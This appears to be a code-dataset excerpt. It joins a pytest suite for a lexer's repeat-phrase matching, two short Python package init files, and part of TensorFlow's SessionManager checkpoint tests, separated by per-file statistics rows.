Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 1] (4)"
IterEnd: "[2, 4] (7)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(4, 7), match='two'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 4] (7)"
IterEnd: "[3, 1] (8)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 8
Start: 7
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[3, 1] (8)"
Success: True
""",
)
assert len(parse_mock.method_calls) == 35
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_MatchThreeLines(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
two
three
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 1] (4)"
IterEnd: "[2, 4] (7)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(4, 7), match='two'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 4] (7)"
IterEnd: "[3, 1] (8)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 8
Start: 7
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[3, 1] (8)"
Success: True
""",
)
assert len(parse_mock.method_calls) == 35
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_NoMatch(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
123
456
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: None
Phrase: "Word"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: None
Phrase: "Newline+"
IsComplete: True
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 1] (0)"
Success: False
""",
)
assert len(parse_mock.method_calls) == 8
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_partialMatch(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
abc123
def456
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='abc'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: None
Phrase: "Word"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: None
Phrase: "Newline+"
IsComplete: True
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Success: False
""",
)
assert len(parse_mock.method_calls) == 16
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_ExactMatch(self, parse_mock):
result = await self._exact_phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
two
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 1] (4)"
IterEnd: "[2, 4] (7)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(4, 7), match='two'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 4] (7)"
IterEnd: "[3, 1] (8)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 8
Start: 7
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 4, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[3, 1] (8)"
Success: True
""",
)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_ExactLimitedMatch(self, parse_mock):
result = await self._exact_phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
two
three
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 1] (4)"
IterEnd: "[2, 4] (7)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(4, 7), match='two'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 4] (7)"
IterEnd: "[3, 1] (8)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 8
Start: 7
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 4, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[3, 1] (8)"
Success: True
""",
)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_ExactNoMatch(self, parse_mock):
result = await self._exact_phrase.LexAsync(
("root", ),
CreateIterator("one"),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 4, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[2, 1] (4)"
Success: False
""",
)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_Error2ndLine3rdToken(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
_expected_match_but_has_underscores
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[2, 1] (4)"
Success: True
""",
)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_Error2ndLine4thToken(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
two _invalid_
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 1] (4)"
IterEnd: "[2, 4] (7)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(4, 7), match='two'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[2, 4] (7)"
Success: True
""",
)
# ----------------------------------------------------------------------
def test_CreationErrors():
with pytest.raises(AssertionError):
RepeatPhrase(TokenPhrase(NewlineToken()), -1, 10)
with pytest.raises(AssertionError):
RepeatPhrase(TokenPhrase(NewlineToken()), 10, 5)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_parseReturnsNone(parse_mock):
# ----------------------------------------------------------------------
class NonePhrase(Phrase):
# ----------------------------------------------------------------------
@Interface.override
async def LexAsync(self, *args, **kwargs):
return None
# ----------------------------------------------------------------------
@Interface.override
def _PopulateRecursiveImpl(
self,
new_phrase: Phrase,
) -> bool:
# Nothing to do here
return False
# ----------------------------------------------------------------------
phrase = RepeatPhrase(NonePhrase("None Phrase"), 1, None)
result = await phrase.LexAsync(("root", ), CreateIterator("test"), parse_mock)
assert result is None
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_OnInternalPhraseFalse(parse_mock):
parse_mock.OnInternalPhraseAsync = CoroutineMock(return_value=False)
Phrase = RepeatPhrase(TokenPhrase(NewlineToken()), 1, None)
result = await Phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
""",
),
),
parse_mock,
)
assert result is None
| 48.668973
| 112
| 0.456986
| 2,990
| 42,196
| 6.403679
| 0.06087
| 0.138716
| 0.182065
| 0.268763
| 0.899932
| 0.899932
| 0.887293
| 0.87878
| 0.867864
| 0.867864
| 0
| 0.01737
| 0.401033
| 42,196
| 866
| 113
| 48.725173
| 0.740207
| 0.046829
| 0
| 0.497585
| 0
| 0
| 0.014049
| 0
| 0
| 0
| 0
| 0
| 0.091787
| 1
| 0.009662
| false
| 0
| 0.057971
| 0.004831
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ba1408d9b8f74852bc37ffeedd1f0b52bc888123
| 53
|
py
|
Python
|
quarantine/view/__init__.py
|
kwoolter/Quarantine
|
7b824a3d6eebbded611c48e44dcb3c2e4007033e
|
[
"BSD-2-Clause"
] | null | null | null |
quarantine/view/__init__.py
|
kwoolter/Quarantine
|
7b824a3d6eebbded611c48e44dcb3c2e4007033e
|
[
"BSD-2-Clause"
] | null | null | null |
quarantine/view/__init__.py
|
kwoolter/Quarantine
|
7b824a3d6eebbded611c48e44dcb3c2e4007033e
|
[
"BSD-2-Clause"
] | null | null | null |
from . view import QMainFrame
from . view import View
| 26.5
| 29
| 0.792453
| 8
| 53
| 5.25
| 0.5
| 0.380952
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169811
| 53
| 2
| 30
| 26.5
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ba2149423eaf6720551bc4e3d9acc8e16e89ebf5
| 190
|
py
|
Python
|
caldera/data/__init__.py
|
jvrana/pyro-graphnets
|
1c9809253e47414ecf3f6604c2147d5676ff76c0
|
[
"MIT"
] | null | null | null |
caldera/data/__init__.py
|
jvrana/pyro-graphnets
|
1c9809253e47414ecf3f6604c2147d5676ff76c0
|
[
"MIT"
] | null | null | null |
caldera/data/__init__.py
|
jvrana/pyro-graphnets
|
1c9809253e47414ecf3f6604c2147d5676ff76c0
|
[
"MIT"
] | null | null | null |
from caldera.data.graph_batch import GraphBatch
from caldera.data.graph_data import GraphData
from caldera.data.graph_tuple import GraphTuple
from caldera.data.loader import GraphDataLoader
| 38
| 47
| 0.873684
| 27
| 190
| 6.037037
| 0.444444
| 0.269939
| 0.368098
| 0.368098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084211
| 190
| 4
| 48
| 47.5
| 0.936782
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e846dc48dfdc956f5402e40dcea479c66a38774e
| 25,714
|
py
|
Python
|
tensorflow/python/training/session_manager_test.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | 6
|
2016-09-07T18:38:41.000Z
|
2020-01-12T23:01:03.000Z
|
tensorflow/python/training/session_manager_test.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/training/session_manager_test.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | 8
|
2017-06-08T09:46:06.000Z
|
2021-06-20T14:03:19.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SessionManager."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
from tensorflow.python.framework import errors
from tensorflow.python.platform import gfile
class SessionManagerTest(tf.test.TestCase):
def testPrepareSessionSucceeds(self):
with tf.Graph().as_default():
v = tf.Variable([1.0, 2.0, 3.0], name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
sess = sm.prepare_session("", init_op=tf.initialize_all_variables())
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFeedDict(self):
with tf.Graph().as_default():
p = tf.placeholder(tf.float32, shape=(3,))
v = tf.Variable(p, name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
sess = sm.prepare_session("",
init_op=tf.initialize_all_variables(),
init_feed_dict={p: [1.0, 2.0, 3.0]})
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFn(self):
with tf.Graph().as_default():
v = tf.Variable([125], name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
sess = sm.prepare_session("",
init_fn=lambda sess: sess.run(v.initializer))
self.assertAllClose([125], sess.run(v))
def testPrepareSessionFails(self):
checkpoint_dir = os.path.join(self.get_temp_dir(), "prepare_session")
checkpoint_dir2 = os.path.join(self.get_temp_dir(), "prepare_session2")
try:
gfile.DeleteRecursively(checkpoint_dir)
gfile.DeleteRecursively(checkpoint_dir2)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with tf.Graph().as_default():
v = tf.Variable([1.0, 2.0, 3.0], name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
sess = sm.prepare_session("", init_op=tf.initialize_all_variables(),
saver=saver, checkpoint_dir=checkpoint_dir)
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
checkpoint_filename = os.path.join(checkpoint_dir,
"prepare_session_checkpoint")
saver.save(sess, checkpoint_filename)
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
# Renames the checkpoint directory.
os.rename(checkpoint_dir, checkpoint_dir2)
gfile.MakeDirs(checkpoint_dir)
v = tf.Variable([6.0, 7.0, 8.0], name="v")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
# This should fail as there's no checkpoint within 2 seconds.
with self.assertRaisesRegexp(
RuntimeError, "no init_op or init_fn or local_init_op was given"):
sess = sm.prepare_session("", init_op=None, saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True, max_wait_secs=2)
# Rename the checkpoint directory back.
gfile.DeleteRecursively(checkpoint_dir)
os.rename(checkpoint_dir2, checkpoint_dir)
# This should succeed as there's checkpoint.
sess = sm.prepare_session("", init_op=None, saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True, max_wait_secs=2)
self.assertEqual(
True, tf.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
def testRecoverSession(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(self.get_temp_dir(), "recover_session")
try:
gfile.DeleteRecursively(checkpoint_dir)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
sess, initialized = sm.recover_session("", saver=saver,
checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess, os.path.join(checkpoint_dir,
"recover_session_checkpoint"))
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
v = tf.Variable(2, name="v")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
sess, initialized = sm2.recover_session("", saver=saver,
checkpoint_dir=checkpoint_dir)
self.assertTrue(initialized)
self.assertEqual(
True, tf.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
